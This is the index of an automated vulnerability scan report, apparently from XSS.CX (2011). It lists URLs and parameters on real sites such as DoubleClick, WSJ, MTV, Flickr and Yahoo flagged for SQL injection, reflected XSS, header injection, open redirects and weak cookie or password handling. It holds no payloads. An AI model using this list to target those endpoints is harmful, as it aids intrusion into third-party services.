XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06142011-01

Report generated by XSS.CX at Tue Jun 14 08:10:34 CDT 2011.

1. SQL injection

1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [;page parameter]

1.2. http://js.microsoft.com/library/svy/windows/broker-config.js [REST URL parameter 2]

1.3. http://l.apture.com/v3/ [name of an arbitrarily supplied request parameter]

1.4. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s22808814137242 [REST URL parameter 1]

1.5. http://s0.wp.com/wp-content/themes/h4/i/ajax-loader.gif [REST URL parameter 4]

1.6. http://s0.wp.com/wp-content/themes/h4/i/header-bg.png [REST URL parameter 2]

1.7. http://s1.wp.com/wp-includes/js/swfobject.js [REST URL parameter 2]

1.8. http://static0.fluxstatic.com/-/Clients/Common/JS/Controls/ButtonControl.js [REST URL parameter 1]

1.9. http://static1.fluxstatic.com/-/Clients/Common/JS/Controls/OverlayPanel.js [REST URL parameter 5]

1.10. http://static2.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBaseControl.js [REST URL parameter 2]

1.11. http://static3.fluxstatic.com/-/Clients/Common/JS/Common/AjaxBasePage.js [REST URL parameter 1]

1.12. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 3]

1.13. http://static3.fluxstatic.com/-/Clients/Common/JS/Controls/PrefilledTextBox.js [REST URL parameter 5]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/ad/N3282.wsj.com/B3951656 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adi/mtv.mtvi/survey [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/music/_mn [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [name of an arbitrarily supplied request parameter]

3.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [sz parameter]

3.3. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [;s parameter]

3.4. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [name of an arbitrarily supplied request parameter]

3.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [click parameter]

3.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [name of an arbitrarily supplied request parameter]

3.7. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.8. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.9. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]

3.10. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.11. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.12. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.13. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.14. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.17. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded [includeWBR&callback parameter]

3.18. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]

3.19. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]

3.20. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]

3.21. http://en.gravatar.com/site/implement [REST URL parameter 1]

3.22. http://en.gravatar.com/site/login/%252F [REST URL parameter 1]

3.23. http://en.gravatar.com/site/login/%252F [REST URL parameter 3]

3.24. http://intensedebate.com/ [name of an arbitrarily supplied request parameter]

3.25. http://js.revsci.net/gateway/gw.js [csid parameter]

3.26. http://members.pega.com/cookiecheck.asp [pcd parameter]

3.27. http://members.pega.com/login.asp [name of an arbitrarily supplied request parameter]

3.28. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137 [callback parameter]

3.29. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]

3.30. http://s.intensedebate.com/images/automattic.png [REST URL parameter 2]

3.31. http://s.intensedebate.com/images/home-sites-sprite.jpg [REST URL parameter 2]

3.32. http://s.intensedebate.com/images/home-sprite.png [REST URL parameter 2]

3.33. http://s.intensedebate.com/images/sprite.png [REST URL parameter 2]

3.34. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]

3.35. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]

3.36. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]

3.37. http://www.forexfactory.com/excal.php [colors[2] parameter]

3.38. http://www.forexfactory.com/excal.php [colors[4] parameter]

3.39. http://www.forexfactory.com/excal.php [colors[8] parameter]

3.40. http://www.forexfactory.com/ws_cal.php [colors[2] parameter]

3.41. http://www.forexfactory.com/ws_cal.php [colors[4] parameter]

3.42. http://www.forexfactory.com/ws_cal.php [colors[8] parameter]

3.43. http://www.mtv.com/games/arcade/game/play.jhtml [arcadeGameId parameter]

3.44. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

3.45. http://www.mtv.com/global/music/scripts/reportFluxView.jhtml [uri parameter]

3.46. http://www.mtv.com/sitewide/scripts/reportIMX.jhtml [arcadeGameId parameter]

3.47. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.48. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]

3.49. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]

3.50. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]

3.51. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101866669 cookie]

3.52. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101945457 cookie]

3.53. http://ar.voicefive.com/b/node_rcAll.pli [ar_p104567837 cookie]

3.54. http://ar.voicefive.com/b/node_rcAll.pli [ar_p20101109 cookie]

3.55. http://ar.voicefive.com/b/node_rcAll.pli [ar_p56282763 cookie]

3.56. http://ar.voicefive.com/b/node_rcAll.pli [ar_p81479006 cookie]

3.57. http://ar.voicefive.com/b/node_rcAll.pli [ar_p82806590 cookie]

3.58. http://ar.voicefive.com/b/node_rcAll.pli [ar_p84552060 cookie]

3.59. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91143664 cookie]

3.60. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97174789 cookie]

3.61. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97464717 cookie]

3.62. http://ar.voicefive.com/bmx3/node.pli [BMX_BR cookie]

3.63. http://ar.voicefive.com/bmx3/node.pli [UID cookie]

3.64. http://ar.voicefive.com/bmx3/node.pli [ar_p101866669 cookie]

3.65. http://ar.voicefive.com/bmx3/node.pli [ar_p101945457 cookie]

3.66. http://ar.voicefive.com/bmx3/node.pli [ar_p104567837 cookie]

3.67. http://ar.voicefive.com/bmx3/node.pli [ar_p20101109 cookie]

3.68. http://ar.voicefive.com/bmx3/node.pli [ar_p56282763 cookie]

3.69. http://ar.voicefive.com/bmx3/node.pli [ar_p81479006 cookie]

3.70. http://ar.voicefive.com/bmx3/node.pli [ar_p82806590 cookie]

3.71. http://ar.voicefive.com/bmx3/node.pli [ar_p84552060 cookie]

3.72. http://ar.voicefive.com/bmx3/node.pli [ar_p91143664 cookie]

3.73. http://ar.voicefive.com/bmx3/node.pli [ar_p97174789 cookie]

3.74. http://ar.voicefive.com/bmx3/node.pli [ar_p97464717 cookie]

4. Flash cross-domain policy

4.1. http://0.gravatar.com/crossdomain.xml

4.2. http://1.gravatar.com/crossdomain.xml

4.3. http://2.gravatar.com/crossdomain.xml

4.4. http://a.tribalfusion.com/crossdomain.xml

4.5. http://ad.doubleclick.net/crossdomain.xml

4.6. http://ads.pointroll.com/crossdomain.xml

4.7. http://ar.voicefive.com/crossdomain.xml

4.8. http://b.scorecardresearch.com/crossdomain.xml

4.9. http://b.voicefive.com/crossdomain.xml

4.10. http://bs.serving-sys.com/crossdomain.xml

4.11. http://community.mtv.com/crossdomain.xml

4.12. http://d3.zedo.com/crossdomain.xml

4.13. http://d7.zedo.com/crossdomain.xml

4.14. http://daapiak.flux.com/crossdomain.xml

4.15. http://ds.serving-sys.com/crossdomain.xml

4.16. http://en.gravatar.com/crossdomain.xml

4.17. http://farm1.static.flickr.com/crossdomain.xml

4.18. http://farm2.static.flickr.com/crossdomain.xml

4.19. http://farm3.static.flickr.com/crossdomain.xml

4.20. http://farm4.static.flickr.com/crossdomain.xml

4.21. http://farm5.static.flickr.com/crossdomain.xml

4.22. http://farm6.static.flickr.com/crossdomain.xml

4.23. http://fls.doubleclick.net/crossdomain.xml

4.24. http://gs.mtv.com/crossdomain.xml

4.25. http://i0.poll.fm/crossdomain.xml

4.26. http://ib.adnxs.com/crossdomain.xml

4.27. http://imx.mtv.com/crossdomain.xml

4.28. http://js.revsci.net/crossdomain.xml

4.29. http://l.yimg.com/crossdomain.xml

4.30. http://log30.doubleverify.com/crossdomain.xml

4.31. http://m.webtrends.com/crossdomain.xml

4.32. http://m1.zedo.com/crossdomain.xml

4.33. http://mswindowswolglobal.112.2o7.net/crossdomain.xml

4.34. http://mtv.mtvnimages.com/crossdomain.xml

4.35. http://now.eloqua.com/crossdomain.xml

4.36. http://om.dowjoneson.com/crossdomain.xml

4.37. http://ping1.unicast.com/crossdomain.xml

4.38. http://pix04.revsci.net/crossdomain.xml

4.39. http://pixel.quantserve.com/crossdomain.xml

4.40. http://puma.vizu.com/crossdomain.xml

4.41. http://s.gravatar.com/crossdomain.xml

4.42. http://secure-us.imrworldwide.com/crossdomain.xml

4.43. http://spd.pointroll.com/crossdomain.xml

4.44. http://spe.atdmt.com/crossdomain.xml

4.45. http://speed.pointroll.com/crossdomain.xml

4.46. http://static0.fluxstatic.com/crossdomain.xml

4.47. http://static1.fluxstatic.com/crossdomain.xml

4.48. http://static2.fluxstatic.com/crossdomain.xml

4.49. http://static3.fluxstatic.com/crossdomain.xml

4.50. http://t.flux.com/crossdomain.xml

4.51. http://t.pointroll.com/crossdomain.xml

4.52. http://tcr.tynt.com/crossdomain.xml

4.53. http://viamtv.112.2o7.net/crossdomain.xml

4.54. http://widgets.flux.com/crossdomain.xml

4.55. http://widgetsak.flux.com/crossdomain.xml

4.56. http://www.forexfactory.com/crossdomain.xml

4.57. http://www.mtv.com/crossdomain.xml

4.58. http://ad.wsod.com/crossdomain.xml

4.59. http://advertising.yahoo.com/crossdomain.xml

4.60. http://api.tweetmeme.com/crossdomain.xml

4.61. http://cm.mtv.overture.com/crossdomain.xml

4.62. http://feeds.bbci.co.uk/crossdomain.xml

4.63. http://geo.yahoo.com/crossdomain.xml

4.64. http://googleads.g.doubleclick.net/crossdomain.xml

4.65. http://my.yahoo.com/crossdomain.xml

4.66. http://newsrss.bbc.co.uk/crossdomain.xml

4.67. http://online.wsj.com/crossdomain.xml

4.68. http://p.opt.fimserve.com/crossdomain.xml

4.69. http://static.ak.fbcdn.net/crossdomain.xml

4.70. http://us.adserver.yahoo.com/crossdomain.xml

4.71. http://www.facebook.com/crossdomain.xml

4.72. http://api.twitter.com/crossdomain.xml

4.73. https://edit.yahoo.com/crossdomain.xml

4.74. http://s0.videopress.com/crossdomain.xml

4.75. http://stats.wordpress.com/crossdomain.xml

4.76. http://videopress.com/crossdomain.xml

4.77. http://yadvertisingblog.app3.hubspot.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.4. http://b.voicefive.com/clientaccesspolicy.xml

5.5. http://mswindowswolglobal.112.2o7.net/clientaccesspolicy.xml

5.6. http://om.dowjoneson.com/clientaccesspolicy.xml

5.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.8. http://spd.pointroll.com/clientaccesspolicy.xml

5.9. http://spe.atdmt.com/clientaccesspolicy.xml

5.10. http://speed.pointroll.com/clientaccesspolicy.xml

5.11. http://stats.wordpress.com/clientaccesspolicy.xml

5.12. http://viamtv.112.2o7.net/clientaccesspolicy.xml

5.13. http://windows.microsoft.com/clientaccesspolicy.xml

5.14. http://js.microsoft.com/clientaccesspolicy.xml

5.15. http://www.microsoft.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://community.mtv.com/Overlays/LogIn.aspx

6.2. http://en.gravatar.com/

6.3. http://en.gravatar.com/site/login/%252F

6.4. http://members.pega.com/login.asp

6.5. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

6.6. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

6.7. http://www.livewithoscar.com/Calendar.aspx

6.8. http://www.livewithoscar.com/Chat.aspx

6.9. http://www.livewithoscar.com/DailyOmni.aspx

6.10. http://www.livewithoscar.com/FlashIframe.aspx

7. XML injection

7.1. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]

7.2. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]

7.3. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

7.4. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

8. Session token in URL

8.1. http://pixel.alexametrics.com/atrk.gif

8.2. http://www.facebook.com/extern/login_status.php

9. SSL certificate

9.1. https://login.yahoo.com/

9.2. https://buy.wsj.com/

9.3. https://edit.yahoo.com/

9.4. https://en.wordpress.com/

9.5. https://login21.marketingsolutions.yahoo.com/

9.6. https://marketingsolutions.login.yahoo.com/

10. Open redirection

10.1. http://b.scorecardresearch.com/r [d.c parameter]

10.2. http://r.nexac.com/e/getdata.xgi [ru parameter]

11. Cookie scoped to parent domain

11.1. http://a.analytics.yahoo.com/fpc.pl

11.2. http://a.analytics.yahoo.com/p.pl

11.3. http://gs.mtv.com/games/playgame.php

11.4. http://www.forexfactory.com/excal.php

11.5. http://a.tribalfusion.com/j.ad

11.6. http://ad.doubleclick.net/clk

11.7. http://ads.pointroll.com/PortalServe/

11.8. http://api.bizographics.com/v1/profile.json

11.9. http://ar.voicefive.com/b/recruitBeacon.pli

11.10. http://b.scorecardresearch.com/b

11.11. http://b.scorecardresearch.com/r

11.12. http://b.voicefive.com/p

11.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.14. http://c.microsoft.com/trans_pixel.asp

11.15. http://cf.addthis.com/red/p.json

11.16. http://cm.mtv.overture.com/js_flat_1_0/

11.17. http://en.wordpress.com/signup/

11.18. http://ib.adnxs.com/pxj

11.19. http://id.google.com/verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif

11.20. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

11.21. http://js.revsci.net/gateway/gw.js

11.22. http://leadback.advertising.com/adcedge/lb

11.23. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

11.24. http://p.opt.fimserve.com/bht/

11.25. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.26. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

11.27. http://px.owneriq.net/ep

11.28. http://stgapi.choicestream.com/instr/csanywhere.js

11.29. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627

11.30. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471

11.31. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106

11.32. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973

11.33. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797

11.34. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769

11.35. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614

11.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

11.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997

11.38. http://www.alexa.com/

11.39. http://www.bizographics.com/collect/

11.40. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

11.41. http://www.flickr.com/about/

11.42. http://www.flickr.com/abuse/

11.43. http://www.flickr.com/beacon_page_timings.gne

11.44. http://www.flickr.com/flanal_event.gne

11.45. http://www.flickr.com/fragment.gne

11.46. http://www.flickr.com/report_abuse.gne

11.47. http://www.flickr.com/signin

11.48. http://www.pega.com/user

12. Cookie without HttpOnly flag set

12.1. http://a.analytics.yahoo.com/fpc.pl

12.2. http://a.analytics.yahoo.com/p.pl

12.3. http://gs.mtv.com/games/playgame.php

12.4. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

12.5. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

12.6. http://a.tribalfusion.com/j.ad

12.7. http://ad.doubleclick.net/clk

12.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

12.9. http://ad.yieldmanager.com/imp

12.10. http://ads.pointroll.com/PortalServe/

12.11. http://api.bizographics.com/v1/profile.json

12.12. http://ar.voicefive.com/b/recruitBeacon.pli

12.13. http://aux1.forexfactory.com/www/delivery/lg.php

12.14. http://b.scorecardresearch.com/b

12.15. http://b.scorecardresearch.com/r

12.16. http://b.voicefive.com/p

12.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.18. http://c.microsoft.com/trans_pixel.asp

12.19. http://cf.addthis.com/red/p.json

12.20. http://cm.mtv.overture.com/js_flat_1_0/

12.21. http://community.mtv.com/Overlays/LogIn.aspx

12.22. http://community.mtv.com/ScriptResource.axd

12.23. http://community.mtv.com/WebResource.axd

12.24. http://en.wordpress.com/signup/

12.25. http://flickr.com/

12.26. http://js.revsci.net/gateway/gw.js

12.27. http://leadback.advertising.com/adcedge/lb

12.28. http://m.webtrends.com/dcsaukzid100008i3dphd1nqy_6p8b/dcs.gif

12.29. http://my.yahoo.com/e/df

12.30. http://p.opt.fimserve.com/bht/

12.31. http://pix04.revsci.net/D08734/a1/0/3/0.js

12.32. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

12.33. http://px.owneriq.net/ep

12.34. http://sales.liveperson.net/hc/12987554/

12.35. http://stgapi.choicestream.com/instr/csanywhere.js

12.36. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627

12.37. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471

12.38. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106

12.39. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973

12.40. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797

12.41. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769

12.42. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614

12.43. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

12.44. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997

12.45. http://www.alexa.com/

12.46. http://www.bizographics.com/collect/

12.47. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

12.48. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

12.49. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

12.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

12.51. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

12.52. http://www.flickr.com/about/

12.53. http://www.flickr.com/abuse/

12.54. http://www.flickr.com/beacon_page_timings.gne

12.55. http://www.flickr.com/flanal_event.gne

12.56. http://www.flickr.com/fragment.gne

12.57. http://www.flickr.com/report_abuse.gne

12.58. http://www.flickr.com/signin

12.59. http://www.forexfactory.com/excal.php

12.60. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx

13. Password field with autocomplete enabled

13.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

13.2. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

13.3. http://community.mtv.com/Overlays/LogIn.aspx

13.4. http://community.mtv.com/Overlays/LogIn.aspx

13.5. http://community.mtv.com/Overlays/LogIn.aspx

13.6. http://community.mtv.com/Overlays/LogIn.aspx

13.7. https://edit.yahoo.com/registration

13.8. http://en.gravatar.com/

13.9. http://en.gravatar.com/site/login/%252F

13.10. https://en.wordpress.com/signup/

13.11. https://login.yahoo.com/config/login

13.12. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

13.13. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

13.14. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

13.15. http://wordpress.com/

13.16. http://www.livewithoscar.com/Calendar.aspx

13.17. http://www.livewithoscar.com/Chat.aspx

13.18. http://www.livewithoscar.com/DailyOmni.aspx

13.19. http://www.livewithoscar.com/FlashIframe.aspx

14. Source code disclosure

15. Referer-dependent response

15.1. http://api.bizographics.com/v1/profile.json

15.2. http://use.typekit.com/k/nop2chq-e.css

15.3. http://www.facebook.com/plugins/fan.php

15.4. http://www.facebook.com/plugins/like.php

15.5. http://www.flickr.com/about/

15.6. http://www.flickr.com/abuse/

15.7. http://www.flickr.com/apps/badge/badge_iframe.gne

15.8. http://www.flickr.com/report_abuse.gne

16. Cross-domain POST

17. SSL cookie without secure flag set

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

18.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

18.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

18.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

18.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.6. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.7. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

18.8. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

18.9. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

18.10. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.11. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.12. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.13. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

18.14. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

18.15. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

18.16. http://ad.doubleclick.net/adi/mtv.mtvi/survey

18.17. http://ad.doubleclick.net/adi/mtv.mtvi/survey

18.18. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/_hp

18.19. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/shows/_mn

18.20. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp

18.21. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp

18.22. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play

18.23. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play

18.24. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/index

18.25. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn

18.26. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn

18.27. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn

18.28. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/_mn

18.29. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

18.30. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/shows/teen_wolf/series

18.31. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

18.32. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

18.33. http://api.twitter.com/1/FanSided/lists//statuses.json

18.34. http://community.mtv.com/Overlays/LogIn.aspx

18.35. https://edit.yahoo.com/forgotroot

18.36. https://edit.yahoo.com/registration

18.37. http://fls.doubleclick.net/activityi

18.38. https://login.yahoo.com/config/login

18.39. https://login.yahoo.com/config/login

18.40. http://members.pega.com/cookiecheck.asp

18.41. http://members.pega.com/pages/css/sites/all/modules/contrib/lightbox2/css/lightbox.css

18.42. http://my.yahoo.com/darla/fc.php

18.43. http://my.yahoo.com/darla/fc.php

18.44. http://my.yahoo.com/darla/fc.php

18.45. http://my.yahoo.com/darla/fc.php

18.46. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

18.47. http://platform.twitter.com/widgets/follow_button.html

18.48. http://platform0.twitter.com/widgets/follow_button.html

18.49. http://s0.videopress.com/js/videopress.js

18.50. http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.js

18.51. http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Overlay.js

18.52. http://us.havaianas.com/front/templates/fragments/recently-viewed.jsp

18.53. http://widgets.flux.com/-/GetAuthCookie.ashx

18.54. http://widgets.flux.com/-/GetAuthCookie.ashx

18.55. http://wordpress.com/signup/

18.56. http://www.facebook.com/plugins/fan.php

18.57. http://www.facebook.com/plugins/like.php

18.58. http://www.flickr.com/apps/badge/badge_iframe.gne

18.59. http://www.flickr.com/apps/badge/badge_iframe.gne

18.60. http://www.flickr.com/apps/badge/badge_iframe.gne

18.61. http://www.flickr.com/fragment.gne

18.62. http://www.google.com/search

18.63. http://www.mtv.com/games/arcade/game/play.jhtml

18.64. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml

18.65. http://www.mtv.com/xd_flux.html

19. Cross-domain script include

19.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

19.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

19.3. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

19.4. http://ad.doubleclick.net/adi/mtv.mtvi/survey

19.5. http://ad.doubleclick.net/adi/mtv.mtvi/survey

19.6. http://chartupload.com/

19.7. http://chartupload.com/gallery.php

19.8. http://community.mtv.com/Overlays/LogIn.aspx

19.9. http://d3.zedo.com//ads3/k/1219/959680/2317/1000002/i.js

19.10. http://en.gravatar.com/

19.11. http://en.gravatar.com/account/forgot-password/

19.12. http://en.gravatar.com/site/implement

19.13. http://en.gravatar.com/site/login/%252F

19.14. http://en.gravatar.com/site/signup/

19.15. https://en.wordpress.com/signup/

19.16. http://intensedebate.com/

19.17. https://login.yahoo.com/config/login

19.18. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do

19.19. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html

19.20. http://us.havaianas.com/MYOH.html

19.21. http://videopress.com/

19.22. http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages

19.23. http://windows.microsoft.com/en-US/internet-explorer/products/ie/home

19.24. http://wordpress.com/

19.25. http://www.alexa.com/

19.26. http://www.facebook.com/plugins/fan.php

19.27. http://www.facebook.com/plugins/like.php

19.28. http://www.flickr.com/

19.29. http://www.flickr.com/about/

19.30. http://www.flickr.com/abuse/

19.31. http://www.flickr.com/apps/badge/badge_iframe.gne

19.32. http://www.flickr.com/report_abuse.gne

19.33. http://www.livewithoscar.com/Calendar.aspx

19.34. http://www.mtv.com/

19.35. http://www.mtv.com/games/arcade/

19.36. http://www.mtv.com/games/arcade/game/play.jhtml

19.37. http://www.mtv.com/music/

19.38. http://www.mtv.com/shows/teen_wolf/series.jhtml

19.39. http://www.mtv.com/xd_flux.html

19.40. http://www.yadvertisingblog.com/blog/category/general/

19.41. http://www.yadvertisingblog.com/blog/downloads/

